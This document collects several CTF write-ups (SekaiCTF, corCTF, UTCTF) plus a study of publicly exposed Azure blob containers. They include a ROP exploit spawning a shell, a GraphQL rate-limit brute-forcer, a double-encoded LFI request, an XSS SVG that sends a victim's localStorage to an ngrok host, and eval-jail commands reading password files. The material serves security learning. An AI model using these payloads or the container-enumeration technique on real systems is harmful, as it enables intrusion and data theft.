b'{"keys": [{"alg": "RS256", "x5c": ["MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAoRX6bRm8JoyCYxmWkhMw\\nlK9qdgcINZ7oy9jFNtsa0o+2vIafzsLKpVL3CbRgqQua1I6k1QXsXAS8/FDnTOHb\\nJ8HiJcl6xv//cohwkzKriYzWNF9o0bKl6S2WsAoEuVpB4HDD0kHYHZZsyAwVbHvv\\nNqlrndrYMlhSWLzXD3VK6w7OIMIC3reE7Urlf5oMVA1D8KOcVfuEBcXyb1yYVSnC\\n9Jy2NIGcZD0mlq3zekhR86ex08QqX5DSZ0djVZQIIH0f7JtiU9rM1UZCek+iVTQO\\n6aBs+wHojv2DkM/4AYblDUVUTO3+kgJlJEzIzgUjhTrcNL4Xi+nEKl3Go2Qs4nvH\\n/wIDAQAB\\n-----END PUBLIC KEY-----"]}]}\n'
===============> End of Second Response
==========
===== Test Poisoned Cache!!
200
{"keys": [{"alg": "RS256", "x5c": ["MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAoRX6bRm8JoyCYxmWkhMw\nlK9qdgcINZ7oy9jFNtsa0o+2vIafzsLKpVL3CbRgqQua1I6k1QXsXAS8/FDnTOHb\nJ8HiJcl6xv//cohwkzKriYzWNF9o0bKl6S2WsAoEuVpB4HDD0kHYHZZsyAwVbHvv\nNqlrndrYMlhSWLzXD3VK6w7OIMIC3reE7Urlf5oMVA1D8KOcVfuEBcXyb1yYVSnC\n9Jy2NIGcZD0mlq3zekhR86ex08QqX5DSZ0djVZQIIH0f7JtiU9rM1UZCek+iVTQO\n6aBs+wHojv2DkM/4AYblDUVUTO3+kgJlJEzIzgUjhTrcNL4Xi+nEKl3Go2Qs4nvH\n/wIDAQAB\n-----END PUBLIC KEY-----"]}]}
==========
200
SEKAI{1337}
On the actual challenge server we got:
SEKAI{tr4nsf3r_3nc0d1ng_ftw!!}
Really fun challenge on a subject whose concepts I had been studying but had never put into practice. It can get quite counter-intuitive, but the challenge helped me understand this scenario much better.
Hello, folks! It’s been a long time since my last write-up, so here goes a short one. Harem scarem was a cool pwnable challenge from corCTF. At first sight, we thought it was about some fancy heap exploitation, but it turned out to be much simpler.
The source code of the challenge was provided and you can check it below.
use fmt;
use bufio;
use bytes;
use os;
use strings;
use unix::signal;
const bufsz: u8 = 8;
type note = struct {
title: [32]u8,
content: [128]u8,
init: bool,
};
fn ptr_forward(p: *u8) void = {
if (*p == bufsz - 1) {
fmt::println("error: out of bounds seek")!;
} else {
*p += 1;
};
return;
};
fn ptr_back(p: *u8) void = {
if (*p - 1 < 0) {
fmt::println("error: out of bounds seek")!;
} else {
*p -= 1;
};
return;
};
fn note_add(note: *note) void = {
fmt::print("enter your note title: ")!;
bufio::flush(os::stdout)!;
let title = bufio::scanline(os::stdin)! as []u8;
let sz = if (len(title) >= len(note.title)) len(note.title) else len(title);
note.title[..sz] = title[..sz];
free(title);
fmt::print("enter your note content: ")!;
bufio::flush(os::stdout)!;
let content = bufio::scanline(os::stdin)! as []u8;
sz = if (len(content) >= len(note.content)) len(note.content) else len(content);
note.content[..sz] = content[..sz];
free(content);
note.init = true;
};
fn note_delete(note: *note) void = {
if (!note.init) {
fmt::println("error: no note at this location")!;
return;
};
bytes::zero(note.title);
bytes::zero(note.content);
note.init = false;
return;
};
fn note_read(note: *note) void = {
if (!note.init) {
fmt::println("error: no note at this location")!;
return;
};
fmt::printfln("title: {}\ncontent: {}",
strings::fromutf8_unsafe(note.title),
strings::fromutf8_unsafe(note.content)
)!;
return;
};
fn handler(sig: int, info: *signal::siginfo, ucontext: *void) void = {
fmt::println("goodbye :)")!;
os::exit(1);
};
export fn main() void = {
signal::handle(signal::SIGINT, &handler);
let idx: u8 = 0;
let opt: []u8 = [];
let notes: [8]note = [
note { title = [0...], content = [0...], init = false}...
];
let notep: *[*]note = &notes;
assert(bufsz == len(notes));
for (true) {
fmt::printf(
"1) Move note pointer forward
2) Move note pointer backward
3) Add note
4) Delete note
5) Read note
6) Exit
> ")!;
bufio::flush(os::stdout)!;
opt = bufio::scanline(os::stdin)! as []u8;
defer free(opt);
switch (strings::fromutf8(opt)!) {
case "1" => ptr_forward(&idx);
case "2" => ptr_back(&idx);
case "3" => note_add(&notep[idx]);
case "4" => note_delete(&notep[idx]);
case "5" => note_read(&notep[idx]);
case "6" => break;
case => fmt::println("Invalid option")!;
};
};
};
Correct me if I’m wrong, but we believe the challenge was written in the Hare programming language.
Going through the source code, we can spot the vulnerability. It lies in the ptr_back function:
fn ptr_back(p: *u8) void = {
if (*p - 1 < 0) {
fmt::println("error: out of bounds seek")!;
} else {
*p -= 1;
};
return;
};
The type of p is unsigned, so *p - 1 will never be less than 0: decrementing from 0 wraps around to 255 instead. We can make idx equal to 0xa and get $RIP control. Also, we can leak the stack address through the note_read function.
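The number of backward moves needed to land on 0xa follows from 8-bit wraparound. Here is a quick sketch of that arithmetic, assuming the u8 index wraps modulo 256 the way the exploit relies on; u8_sub is just an illustrative helper.

```python
def u8_sub(value: int, amount: int = 1) -> int:
    """Subtract with 8-bit unsigned wraparound."""
    return (value - amount) % 256


idx = 0
for _ in range(246):  # same count as the loop in the exploit
    idx = u8_sub(idx)

print(hex(idx))  # 0xa, two slots past the end of the 8-entry notes array
```

Since notes only has indexes 0 to 7, writing a note at index 10 lands outside the array on the stack.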
The full exploit is provided below.
#!/usr/bin/env python
from pwn import *
import sys


def pa(addr):
    info("%#x", addr)


def move_ptr_back():
    p.sendlineafter(b'>', b'2')


def note_add(title, content):
    p.sendlineafter(b'>', b'3')
    p.sendlineafter(b'title:', title)
    p.sendlineafter(b'content:', content)


def read_note():
    p.sendlineafter(b'>', b'5')


def exploit():
    # 246 decrements wrap the u8 index from 0 to 0xa
    for i in range(246):
        move_ptr_back()

    if REMOTE:
        note_add(b'AAA', b'BBB')

    # leak stack address
    read_note()
    p.recvuntil(b'content:')
    p.recv(15)
    stack_leak = u64(p.recv(8))
    pa(stack_leak)

    rop_chain = b'B' * 14
    rop_chain += p64(stack_leak+8)   # RBP -> RSP+8
    rop_chain += p64(0x800496b)      # clc ; mov rax, qword ptr [rbp - 8] ; leave ; ret
    rop_chain += p64(0x3b)           # execve syscall number
    rop_chain += p64(stack_leak+48)  # RBP -> RSP+48
    rop_chain += p64(0x80169cc)      # pop rsi ; pop r13 ; pop r12 ; pop rbx ; leave ; ret
    rop_chain += p64(stack_leak+32)  # rsi
    rop_chain += b'/bin/sh\x00'      # r13
    rop_chain += p64(0)              # r12
    rop_chain += p64(0xbabebabe)     # rbx
    rop_chain += p64(0x801a452)      # clc ; mov rdi, rsi ; mov rsi, rdx ; syscall

    note_add(b'AAABBBCCC', rop_chain)
    p.interactive()


if __name__ == '__main__':
    REMOTE = len(sys.argv) > 1
    if REMOTE:
        p = remote(sys.argv[1], int(sys.argv[2]))
        # solve the proof of work before talking to the challenge
        p.recvuntil(b'-s ')
        pof_ps = process(['./pow', p.recvline().strip()])
        pof = pof_ps.readline()
        p.sendline(pof)
    else:
        p = process(['./harem'])
    exploit()
corCTF is maintained by the Crusaders of Rust Team. The 2023 edition happened between 28 and 30-JUL.
This is a great CTF for Web with some really hard and creative challenges.
I worked on 4 challenges and solved 3.
In this challenge, you are presented with a textarea, where you can write a GraphQL query and send it to the server.
Your mission (should you choose to accept it), is sending the right secret number.
Maybe, among those 118 solves, someone was lucky :) Since that’s never my case, let’s work.
It’s a small NodeJS/Fastify app:
import fastify from 'fastify'
import mercurius from 'mercurius'
import { randomInt } from 'crypto'
import { readFile } from 'fs/promises'
const app = fastify({
logger: true
});
const index = await readFile('./index.html', 'utf-8');
const secret = randomInt(0, 10 ** 5); // 1 in a 100k??
console.log(secret);
let requests = 10;
setInterval(() => requests = 10, 60000);
await app.register(mercurius, {
schema: `type Query {
flag(pin: Int): String
}`,
resolvers: {
Query: {
flag: (_, { pin }) => {
if (pin != secret) {
return 'Wrong!';
}
return process.env.FLAG || 'corctf{test}';
}
}
},
routes: false
});
app.get('/', (req, res) => {
return res.header('Content-Type', 'text/html').send(index);
});
app.post('/', async (req, res) => {
if (requests <= 0) {
return res.send('no u')
}
requests --;
return res.graphql(req.body);
});
app.listen({ host: '0.0.0.0', port: 80 });
GET to / returns the index.html static page with our textarea.
POST to / processes the request body (AS IS) as GraphQL and returns the result.
The app accepts at most 10 POST requests per minute (the counter is reset every 60 seconds).
We have to hit the correct number, between 0 and 99,999.
We don’t have any information about it (like the previous random), so I wouldn’t try to break it. Maybe you have more faith than me.
Brute-forcing must be the happy path here, since the range is not too big. But since we have a rate-limit of 10 requests/minute, it would take almost 7 days to break. Not enough CTF time for that (and even with an impossible 1-week CTF, instances would stop in 10 minutes).
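The estimate above is simple arithmetic. A quick sketch of it (the constant names are mine; the numbers come from the challenge source):

```python
# Rough time needed to try every pin at one guess per POST.
PIN_SPACE = 10 ** 5          # randomInt(0, 10 ** 5) yields 0..99999
REQUESTS_PER_MINUTE = 10     # the counter is reset to 10 every 60 seconds

minutes = PIN_SPACE / REQUESTS_PER_MINUTE
days = minutes / (60 * 24)
print(f"{minutes:.0f} minutes, about {days:.2f} days")
```

That is 10,000 minutes, a little under 7 days.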
But we can use a trick here. Our rate-limit is based on the number of POSTs sent to the server, but GraphQL allows us to make more than 1 query in the same string. Since the app sends the whole body to the graphql engine, we can take advantage of it!
Let’s make a test:
query Abc { flag(pin: 1234) }
query Def { flag(pin: 1235) }
But it complains:
{
"errors": [
{
"message": "Must provide operation name if query contains multiple operations."
}
],
"data": null
}
That’s where we took some time to solve it. We were trying to send multiple queries using the JSON with operationName and the query, like this:
{
"query": "query Abc { flag(pin: 1) }",
"operationName": "Flag1"
}
We got nowhere with this. While overcomplicating things, we found some interesting stuff that may or may not get us a future article.
Since we saw a lot of solves, we knew that there must be a simpler path and we were just missing the right syntax. Alisson came to the rescue with a simpler format I hadn’t seen before:
query GetFlag {
f1: flag(pin: 1)
f2: flag(pin: 2)
}
And we finally got what we wanted: multiple queries and multiple answers in the same request, which bypasses the rate-limit and allows the brute-force.
{
"data": {
"f1": "Wrong!",
"f2": "Wrong!"
}
}
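Since every alias comes back as its own key, spotting the winning guess is just a matter of filtering the response. A minimal sketch, assuming aliases named f<pin> as in the query above; the sample response and the find_hits helper are made up for illustration:

```python
import json

def find_hits(response_text, wrong="Wrong!"):
    """Return {alias: value} for every aliased field that is not the 'Wrong!' answer."""
    data = json.loads(response_text).get("data") or {}
    return {alias: value for alias, value in data.items() if value != wrong}

# Hypothetical response body, shaped like the one shown above.
sample = '{"data": {"f1": "Wrong!", "f2": "Wrong!", "f3": "corctf{test}"}}'
print(find_hits(sample))
```

The alias that survives the filter also tells you which pin was right, since the pin is part of its name.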
From a GraphQL perspective, we could, in theory, send only 1 request with all 100k queries, but the request gets too big. We tested and settled on 10k queries per request, which fits inside the rate-limit and solves it in 1 minute or less, because it takes a maximum of 10 requests.
This is a “beautified” version of the exploit we used in the CTF, for beautifying purposes.
import requests
headers = {
    'Content-Type': 'text/plain;charset=UTF-8',
}
for i in range(10):
    MAX_NUM = 10000 # Queries per request
    # Note: as written, the first batch starts at 10000, so pins 0-9999 are
    # never tried; INI = i*MAX_NUM would cover the full 0-99999 range.
    INI = (i*MAX_NUM)+MAX_NUM
    print(f'=========> Brute Range: {INI} - {INI+MAX_NUM-1}')
    # One aliased field per pin: f1234: flag(pin: 1234)
    QUERIES = '\n'.join([f'f{x}: flag(pin: {x})' for x in range(INI,INI+MAX_NUM)])
    OPERATION = 'query Getflag { ' + QUERIES +' }'
    response = requests.post('https://web-force-force-384c2b201a1a2244.be.ax/', headers=headers, data=OPERATION)
    result = response.text.replace(',', ',\n')
    print(f'Status: {response.status_code}')
    FLAG_PREFIX = 'corctf{'
    index = result.find(FLAG_PREFIX)  # -1 when the prefix is absent
    if index >= 0:
        flag_end = result.index('}', index+len(FLAG_PREFIX)) + 1
        flag = result[index:flag_end]
        print(f'Flag is {flag}')
        break
    else:
        print('Not yet!')
    print()
python exploit2.py
=========> Brute Range: 10000 - 19999
Status: 200
Not yet!
=========> Brute Range: 20000 - 29999
Status: 200
Not yet!
=========> Brute Range: 30000 - 39999
Status: 200
Not yet!
=========> Brute Range: 40000 - 49999
Status: 200
Not yet!
=========> Brute Range: 50000 - 59999
Status: 200
Not yet!
=========> Brute Range: 60000 - 69999
Status: 200
Flag is corctf{S T O N K S}
corctf{S T O N K S}
This challenge gives you an upload page that “anonymizes” an image.
After uploading an image:
(OK, now he’s protected)
OK, I could make a complete analysis of the challenge, but after reading some code, we got to the visualization route:
@app.route('/anonymized/<image_file>')
def serve_image(image_file):
    file_path = os.path.join(UPLOAD_FOLDER, unquote(image_file))
    if ".." in file_path or not os.path.exists(file_path):
        return f"Image {file_path} cannot be found.", 404
    return send_file(file_path, mimetype='image/png')
Since it serves a local file whose path is built from the image_file parameter, we immediately think of an LFI.
There is a filter for .., to avoid a path traversal like ../../../flag.txt, so we can’t use the most basic LFI.
It turns out that os.path.join has an almost backdoor-like behaviour: if a later component is an absolute path, all the previous components are discarded.
>>> import os
>>>
>>> os.path.join('/uploads', 'file1.png')
'/uploads/file1.png'
>>>
>>> os.path.join('/uploads', '/file1.png')
'/file1.png'
Why? I don’t know the rationale, but the behaviour is documented for os.path.join.
Knowing this, and also that the flag is in the file /flag.txt, we can just think of this.
>>> os.path.join('/uploads', '/flag.txt')
'/flag.txt'
Also note that it calls unquote on the image_file path parameter.
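To see how these two details combine, here is a small sketch that mimics only the path-building line and the ".." check of the route. UPLOAD_FOLDER is a hypothetical value (the real one is not shown here), resolve is my own helper, and posixpath is used so the result is the same as os.path on a Linux server regardless of where you run it:

```python
import posixpath
from urllib.parse import unquote

UPLOAD_FOLDER = "/uploads"  # hypothetical; stands in for the app's real folder

def resolve(image_file):
    """Return (file_path, blocked) the way serve_image() would compute them."""
    file_path = posixpath.join(UPLOAD_FOLDER, unquote(image_file))
    return file_path, ".." in file_path

print(resolve("frog.png"))        # stays inside the upload folder
print(resolve("../../flag.txt"))  # caught by the ".." filter
print(resolve("%2Fflag.txt"))     # absolute after unquote, the folder is dropped
```

The last case never contains "..", so the filter has nothing to object to.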
Let’s try calling it directly, just for fun.
curl --path-as-is https://msfrognymize.be.ax/anonymized//flag.txt
<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="http://msfrognymize.be.ax/anonymized/flag.txt">http://msfrognymize.be.ax/anonymized/flag.txt</a>. If not, click the link.
It’s fixing the path and redirecting… not good. Let’s try it URL-encoded.
> encodeURIComponent('/flag.txt')
'%2Fflag.txt'
>
Go again
curl --path-as-is https://msfrognymize.be.ax/anonymized/%2Fflag.txt
<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="http://msfrognymize.be.ax/anonymized/flag.txt">http://msfrognymize.be.ax/anonymized/flag.txt</a>. If not, click the link.
Same boring result. Since it’s unquoting on the server side (beyond basic HTTP transfer), let’s double-encode it:
> encodeURIComponent(encodeURIComponent('/flag.txt'))
'%252Fflag.txt'
curl --path-as-is https://msfrognymize.be.ax/anonymized/%252Fflag.txt
corctf{Fr0m_Priv4cy_t0_LFI}
After registration, you see 4 (frog) cards owned by admin and a plus sign, which is a button to add a new card owned by your user.
On the new card screen, you have some simple options, including an SVG URL for your frog.
SVG URL…
It’s a Node/NextJS App. There is a lot of code in various files here, so I won’t go into detail in all of them.
First of all, let’s check where the flag will be available.
export default {
flag: "corctf{t3st_fl4g}",
password: "adminadmin"
};
import secrets from './secrets';
const username = "admin";
const { flag, password } = secrets;
export default {
id: 'frogshare',
name: 'frogshare',
timeout: 20000,
handler: async (url, ctx) => {
const page = await ctx.newPage();
await page.goto("https://frogshare.be.ax/login", { waitUntil: 'load' });
await page.evaluate((flag) => {
localStorage.setItem("flag", flag);
}, flag);
await page.type("input[name=username]", username);
await page.type("input[name=password]", password);
await Promise.all([
page.waitForNavigation(),
page.click("input[type=submit]")
]);
/* No idea why the f this is required :| */
await page.goto("https://frogshare.be.ax/frogs?wtf=nextjs", { timeout: 5000, waitUntil: 'networkidle0' });
await page.waitForTimeout(2000);
await page.goto(url, { timeout: 5000, waitUntil: 'networkidle0' });
await page.waitForTimeout(5000);
},
}
For those unfamiliar with XSS challenges, you usually have an admin bot that simulates a real user with admin privileges, logs in to the same system you’re trying to hack, and navigates to a URL you provide.
In this case, the bot stores the flag in localStorage, logs in as admin with the secret password (not the same as in our provided source code, of course), visits https://frogshare.be.ax/frogs?wtf=nextjs, and then opens our URL and waits 5 seconds.
So, the objective here is to leak the flag from the admin browser’s localStorage. The 5 seconds are basically the time our XSS has to leak the info.
At the beginning of the challenge, an NPM package caught my attention, which is being used in Frog.js: external-svg-loader.
https://github.com/shubhamjain/svg-loader
SVG Loader is a simple JS library that fetches SVGs using XHR and injects the SVG code in the tag's place. This lets you use externally stored SVGs (e.g, on CDN) just like inline SVGs.
There is something here. This library injects external SVGs (cross-domain) in the local (target) DOM. SVGs can contain JavaScript. In the case of this app, since we provide the SVG, we can also inject its JavaScript, in theory.
The documentation shows that there is a protection on it:
2. Enable Javascript
SVG format supports scripting. However, for security reasons, svg-loader will strip all JS code before injecting the SVG file. You can enable it by:
<svg
data-src="https://unpkg.com/@mdi/svg@5.9.55/svg/heart.svg"
data-js="enabled"
onclick="alert('clicked')"
width="50"
height="50"
fill="red"></svg>
It only loads JavaScript when the data-js attribute is set to enabled, which is not the case, judging by the tag in Frog.js.
<svg data-src={img} {...svgProps} />
BUT, svgProps comes from the frog object, which comes from the user payload:
const svgProps = useMemo(() => {
try {
return JSON.parse(frog.svgProps);
} catch {
return null;
}
}, [frog.svgProps]);
It puts all the attributes sent by the user on the svg object.
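The app itself is React, but the effect of the spread is easy to model in a few lines of Python. This is only an analogy under my own assumptions: render_svg_tag is a hypothetical helper, and the example.com URL is a placeholder. It is not how Next.js renders anything; it just shows that every key the user sends ends up as an attribute.

```python
import json
from html import escape

def render_svg_tag(img, svg_props_json):
    """Model <svg data-src={img} {...svgProps} /> as a plain string."""
    try:
        props = json.loads(svg_props_json)
    except json.JSONDecodeError:
        props = None                      # same fallback as the catch branch
    if not isinstance(props, dict):
        props = {}
    # The spread: user-controlled keys are merged next to data-src, unfiltered.
    attrs = {"data-src": img, **props}
    rendered = " ".join(f'{escape(k)}="{escape(str(v))}"' for k, v in attrs.items())
    return f"<svg {rendered} />"

print(render_svg_tag("https://example.com/frog.svg",
                     '{"height": 100, "data-js": "enabled"}'))
```

Nothing in this path decides which attribute names are acceptable, which is exactly the gap the rest of the exploit relies on.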
Let’s look at a sample JSON request for it, while submitting the frog info.
{
"name": "NepFrog",
"url": "https://ctf.cor.team/2023-ctf/frogs/pepega-frog.svg",
"svgProps": {
"height": 100,
"width": 100
}
}
Let’s see the happy-path result:
<svg
data-src="https://ctf.cor.team/2023-ctf/frogs/pepega-frog.svg"
height="100"
width="100"
version="1.1"
id="Layer_1"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
viewBox="0 0 512.003 512.003"
xml:space="preserve"
data-id="svg-loader_44">
Note that our parameters height and width turned into HTML attributes for the svg object.
Now we have enough information for an action plan, starting with the data-js attribute on the svg tag (controlled by the external-svg-loader).
Let’s try injecting the data-js parameter on the svg.
payload.json
{
"name": "NepFrog",
"url": "https://ctf.cor.team/2023-ctf/frogs/pepega-frog.svg",
"svgProps": {
"height": 100,
"width": 100,
"data-js": "enabled"
}
}
inject-payload.sh
curl 'https://frogshare.be.ax/api/frogs?id=81' \
-X 'PATCH' \
-H 'Accept: application/json, text/plain, */*' \
-H 'Content-Type: application/json' \
-H 'Cookie: session=2bbfe567ecf3c637ea12379ae3cc160a96e2fa84530c821b8e0f42e7cc7293ac' \
-d @payload.json
{"msg":"Frog updated successfully"}
After reloading, our injected attribute is there.
<svg
data-src="https://ctf.cor.team/2023-ctf/frogs/pepega-frog.svg"
height="100" width="100"
data-js="enabled"
version="1.1" id="Layer_1"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
viewBox="0 0 512.003 512.003"
xml:space="preserve"
data-id="svg-loader_1">
We just bypassed the javascript filter.
We now need to serve the rogue SVG from a server we control. Since external-svg-loader relies on CORS for fetching, I created an app with my own hands for this.
“I” came up with the source below:
from flask import Flask, send_file, request
from flask_cors import CORS

app = Flask(__name__)
CORS(app)  # Enable CORS for the Flask app

# Serve the evil svg
@app.route('/svg')
def serve_svg():
    svg_file_path = 'evil.svg'
    return send_file(svg_file_path, mimetype='image/svg+xml')

# Route to receive the flag
@app.route('/flag')
def flag_route():
    data = request.args.get('data', '')
    return data

if __name__ == '__main__':
    app.run()
The last piece is the evil SVG itself, served through ngrok, which points to my running local webapp.
We can use a very simple JavaScript to get the localStorage info and send it back to our server. Logging to the console only to simplify local tests.
console.log("Hello!");
fetch("https://ngrok-url/flag?data=" +
encodeURIComponent(localStorage.getItem("flag")),
{"mode": "no-cors"})
.then(() => console.log("Sent!"));
That goes in our SVG:
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 500">
<script>//<![CDATA[
console.log("Hello!");
fetch("https://0000-000-00-000-00.ngrok-free.app/flag?data=" + encodeURIComponent(localStorage.getItem("flag")), {"mode": "no-cors"}).then(() => console.log("Sent!"));
//]]>
</script>
</svg>
Let’s test the payload in the App, with our user. For fun, let’s put a fake flag in the localStorage of our browser in the frogshare app domain.
Let’s Frog it:
{
"name": "NepFrog",
"url": "https://fd5f-201-17-122-29.ngrok-free.app/svg",
"svgProps": {
"height": 100,
"width": 100,
"data-js": "enabled"
}
}
Looks like something is on its way
Ngrok validates our test
Hack is in place. Fire in the (AdminBot) Hole!
corctf{M1nd_Th3_Pr0p_spR34d1ng_XSS_ThR34t}
Being one of the most widely used storage services on the web - probably only falling behind AWS’s storage services - Azure storage accounts provide a simple and effective way of storing many kinds of data in the cloud. They allow you to store your data in blob containers, file shares, tables or queues without having to worry about scalability, durability and availability. In less than 5 minutes you can set up a storage account under your subscription and upload your data into the cloud. After that you can use all sorts of cloud services on top of your data, develop data analysis pipelines, automated notifications, or just host static websites.
The simplest type of storage service you can use is object storage: services that allow you to store any kind of file in them and access the file by its name, usually providing a URL for your file under the cloud’s domain. One such service is Azure blob storage, a service from Azure storage accounts. Azure blob storage works similarly to S3 buckets - you create a storage account, then in that account you create a Container for your files, choose the appropriate Public access level for your container and upload your files into it.
Azure enables public access to blobs by default when you create a storage account:
Then, when you decide to use Azure blob storage, this is the page you will be looking at:
When you’re creating the container for your objects, you choose one of these Public access levels:
Azure pre-selects Private for you and then warns against using Container as the access level for your container - but many ignore it:
The issue with the Container public access level is that, although an attacker will not be able to enumerate the containers in the root of the storage account, most organizations tend to use a small set of common names for their containers, like images, videos or logs. An attacker can easily try a small wordlist like this on the public endpoint of the blob storage service, since there doesn’t seem to be any sort of rate limiting in Azure that prevents this sort of behavior.
I decided to take a look at this issue to understand how big the problem is, so I developed a fast scanning tool, goblob, to enumerate exposed blob containers in Azure storage accounts. A friend pointed out to me that SpongeBlob would be much funnier, but then it was too late and I had already chosen a name 🫤.
The idea is that, if you get an HTTP 200 accessing the container endpoint:
https://<storageaccount>.blob.core.windows.net/<containername>?restype=container
Then it means that the specified container exists under that storage account and that it’s publicly exposed with an access level of Container. Then you can append &comp=list to the URL to get a pretty XML listing all blobs under that container.
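The two URLs are easy to derive from an account name and a container name. A minimal sketch that only builds the strings and sends nothing; container_probe_urls and the account name examplestorage are hypothetical, and this is not how goblob itself is implemented:

```python
from urllib.parse import quote

def container_probe_urls(account, container):
    """Build the existence-check URL and the listing URL for one candidate."""
    base = f"https://{account}.blob.core.windows.net/{quote(container)}"
    exists_url = f"{base}?restype=container"
    list_url = f"{exists_url}&comp=list"
    return exists_url, list_url

for container in ["images", "videos", "logs"]:
    print(container_probe_urls("examplestorage", container))
```

A scanner then only has to request the first URL for each pair and keep the ones that answer with HTTP 200.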
To perform this analysis I’d need more than just that, though - I needed a sample of existing storage account names, and then a wordlist of possible container names under these storage accounts.
For the issue of finding storage account names, I decided to find subdomains of Azure storage services, since they always include the name of the storage account. I used a combined approach - first I used my NameScraper tool to scrape SecurityTrails’ public data for subdomains of blob.core.windows.net, table.core.windows.net, queue.core.windows.net and file.core.windows.net. Then I used amass to gather more subdomains of these domains from miscellaneous OSINT sources. For the wordlist, I adapted an existing open-source wordlist of bucket names into a 2087-word wordlist of possible container names.
The full plan was as follows:
This approach yielded a list of 39,731 possible storage account names to check against 2,087 container names - a search space of almost 83 million container URLs. I checked them with goblob to find the URLs of the first 20 pages of blobs in each container:
$ ./goblob -accounts=storage-accounts.txt -containers=wordlists/goblob-folder-names.txt -maxpages=20 -output=blobs.txt -blobs=true
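For reference, the size of that search space is just the product of the two list lengths (variable names are mine; the figures are the ones quoted above):

```python
accounts = 39_731         # candidate storage account names
container_names = 2_087   # entries in the container wordlist

search_space = accounts * container_names
print(f"{search_space:,} candidate container URLs")
```

That comes to 82,918,597, the "almost 83 million" mentioned above.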
Obviously this took some hours to run, but by the time it finished I had a list of URLs for 19,630,450 exposed blobs. These blobs amounted to a total of 55 TB of data. The public containers were found across 1,272 storage accounts (3.2% of my sample) using a total of 516 distinct container names (~1/4 of my wordlist). Here is a wordcloud of the exposed container names found:
An even harder problem is to figure out which of these URLs contain sensitive information, as most people won’t have 55 TB of storage hanging around to download and analyze the full data. I didn’t download this data for obvious reasons, but I did analyze their URLs and file extensions briefly. Here are the main highlights that I found interesting (and worrisome!):
The simplest mitigation for this sort of issue is to have an up-to-date inventory of your storage account containers and make sure all containers containing sensitive information have an access level of Private. In some cases it might be okay to use an access level of Blob on your container, such as when the only files you intend to store there have a sufficiently random identifier in the name, like a GUID, but the Container access level should be avoided whenever possible.
If you have a scenario where you can’t use the Private access level because you have an external partner that needs access to your data, the preferred method for doing that is by using a Shared Access Signature to create temporary credentials that can be used by the partner for specific actions inside your storage account. You can even configure a set of IPs which should be allowed to use your SAS:
You can also restrict or disable public network access in the Networking tab:
If your partner is processing data from your blob storage using applications in their Azure tenant, they can even set up a private endpoint to access your storage account directly through Azure’s network, without the need to traverse the public internet.
Another action that could be taken is to implement rules to detect the usage of this sort of technique. Last month Microsoft published a great article on this subject, detailing how they implemented 8 key detection rules in Defender for Storage to help identify possible attempts to compromise exposed blobs. They also shared Sentinel queries in KQL that can be used to detect this kind of scenario. Check it out if you want to know more:
MS Tech Community - Protect your storage resources against blob-hunting
I hope you enjoyed the reading and learned a good example of how small mistakes can lead to great damage. This whole analysis was done with no specific target in mind, using basic cloud knowledge, a standard laptop, public resources and some patience. Motivated attackers with enough resources have probably already automated this sort of process and some may have the ability to find your company’s secrets in the blink of an eye. Remember to keep your containers private and your blobs safe :-)
In case you liked this article, here are some additional resources to read on the topic of Azure blob storage:
UTCTF is maintained by the Information & Systems Security Society at the University of Texas at Austin.
Since I’m not a Python Jail Houdini like Alisson, my solution was WAY, WAY harder than most (or all) teams. But since it was an unintended solution and I learnt a lot in the process, it was worth it.
Yes, 77 solves, but since it’s a fun different path, it deserves the writeup.
The challenge is a number guessing game, where the right guess gives you the password for the next level. The range of possible numbers is big, so you won’t really make the right guess (or maybe you’re a prophet, who knows?).
It’s a simple form with a post to the server, no javascript involved. The guessing process is all done on the server side and the challenge is blind, without the server source-code.
<form method="post" action="#level-0">
<input type="text" name="expression" />
<input type="submit" value="Run" />
<input type="hidden" name="type" value="calculate" />
<input type="hidden" name="level" value="0" />
</form>
It says “It'll even do math for you!”. Let’s try it.
It works! It EVALuates the expression (spoiler-alert).
Now let’s touch the app with the evil hand, trying to force an exception with a possibly wrong expression.
Gotcha!
result = eval(answer)
Since we can just send a string to eval, the RCE is just automatic.
Let’s try getting the source-code (we know the file name by the previous exception):
open('./problem.py').read()
And we get problem.py.
import random
password = open("password.txt").read()
solution = random.getrandbits(32)
answer = input()
result = eval(answer)
if result == solution:
    print(f"{result}, correct! The password is '{password}'.")
else:
    print(f"Result: {result}. The correct answer was {solution}.")
There is a password to unlock the next level, let’s try getting the password file.
open("password.txt").read()
And..
Result: PuXqj7n4WNZzStnWbtPv. The correct answer was 4045986092.
Let’s try it:
That was easy. Bring more.
Let’s start trying the same.
open('./problem.py').read()
Not such a good result.
Traceback (most recent call last):
File "problem.py", line 7, in <module>
result = eval(answer, {"open": None})
File "<string>", line 1, in <module>
TypeError: 'NoneType' object is not callable
It blocked the open function. Can’t directly open the source or the password file… can’t we?
Let’s try a shell RCE. Since eval only accepts a single expression, we can’t run statements like import os followed by os.system("cmd"). Instead, we can import using a builtin function and then call it.
__import__("os").system("cat password.txt")
Krdi9yQuY8mHoteZDCF5Result: 0. The correct answer was 1615348051.
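The difference between a statement and an expression, and why shadowing open does not stop __import__, can be checked locally. A small sketch reusing the {"open": None} globals from the traceback above (restricted_globals is my own name for it):

```python
# A statement is rejected: eval() only accepts expressions.
try:
    eval('import os')
except SyntaxError as exc:
    print("statement rejected:", exc.msg)

# An expression can still import. __import__ is a builtin, and eval() adds
# __builtins__ to the globals dict when the caller did not supply one.
restricted_globals = {"open": None}
sep = eval('__import__("os").sep', restricted_globals)
print(repr(sep))

# open itself is shadowed by None, exactly like on the server.
try:
    eval('open("password.txt")', restricted_globals)
except TypeError as exc:
    print("open blocked:", exc)
```

So hiding a single name only removes that name; everything else in builtins is still reachable.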
Let’s try to check-in to the next level with it.
Unlocked level 2
Next!
Let’s start with the previous payload.
cat: password.txt: No such file or directory
OK, we still have the RCE with the same payload, but there is no password file. Let’s check the source code of level 2.
__import__("os").system("cat problem.py")
Resulting in problem2.py:
import random, os
password = open("password.txt").read()
